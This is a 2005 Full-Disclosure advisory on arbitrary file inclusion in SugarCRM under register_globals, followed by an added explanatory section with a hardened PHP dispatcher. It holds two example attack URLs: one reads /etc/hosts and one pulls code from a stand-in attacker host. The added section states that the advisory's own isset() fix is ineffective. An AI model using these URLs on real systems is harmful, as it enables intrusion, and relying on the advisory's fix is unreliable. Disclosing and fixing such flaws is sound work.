[Full-Disclosure] Arbitrary file inclusion in SugarCRM [PHP]

From: Santiago Cortes (blindotgmail.com)
Date: Thu Jan 06 2005 - 15:46:41 CST


------------------------------------------------------------
Arbitrary File Inclusion in SugarCRM
------------------------------------------------------------
Author: Santiago Cortés
Date: Jan 06, 2005
------------------------------------------------------------

Vulnerability:

Failure to sanitize user input in index.php opens the possibility for
an attacker to include an arbitrary file when PHP's "register_globals"
is on.

Example:

http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=/etc/hosts

http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=http://www.attackersite.com/malicious.php

Fix:
Disable register_globals in your php.ini file, or

Replace line 198 in index.php:
$currentModuleFile = $moduleDefaultFile[$currentModule];

With
if ( !isset($moduleDefaultFile[$currentModule]) ) {
   die('No action specified');
}
$currentModuleFile = $moduleDefaultFile[$currentModule];
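
As an added illustration (not part of this advisory and not SugarCRM's code), the pattern below shows why the include in index.php is reachable under register_globals, next to a dispatcher that does not depend on register_globals at all: the module-to-file map is a constant defined in code, the requested module is checked against its keys, and the resolved path is confirmed to lie under the modules directory. MODULE_FILES, safe_module_file() and the modules/ directory layout are assumptions for the example.

```php
<?php
// Added example, not SugarCRM's code.

// --- Vulnerable pattern the advisory describes --------------------------
// With register_globals=On, a request such as
//   index.php?module=Home&moduleDefaultFile[Home]=/etc/hosts
// creates $moduleDefaultFile['Home'] = '/etc/hosts' before the script's
// own code runs, so the original line 198
//   $currentModuleFile = $moduleDefaultFile[$currentModule];
// hands a client-chosen path to include(). An isset() check does not help
// here, because the attacker is the one who set the variable.

// --- Hardened dispatcher ------------------------------------------------
// The map is a constant in this file, so a client cannot create or
// overwrite it, and only its keys are accepted as module names.
const MODULE_FILES = [
    'Home'     => 'Home/index.php',
    'Contacts' => 'Contacts/index.php',
];

// Returns the absolute file to include, or null to refuse the request.
function safe_module_file(string $requestedModule, string $modulesDir): ?string
{
    if (!array_key_exists($requestedModule, MODULE_FILES)) {
        return null;                           // unknown module: refuse
    }
    $base   = realpath($modulesDir);
    $target = realpath($modulesDir . '/' . MODULE_FILES[$requestedModule]);
    if ($base === false || $target === false) {
        return null;                           // directory or file missing
    }
    // Containment check; the trailing separator keeps "modules_other"
    // from matching "modules".
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Read the module name from $_GET explicitly; never rely on a global that
// the client may have populated.
$module = isset($_GET['module']) ? (string) $_GET['module'] : 'Home';
$file   = safe_module_file($module, __DIR__ . '/modules');
if ($file === null) {
    http_response_code(404);
    die('No action specified');
}
include $file;
```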

Disclaimer:

The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result
of using the information or demonstrations provided in any part of
this advisory.

Contact:
Santiago Cortés
blindot --at-- gmail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html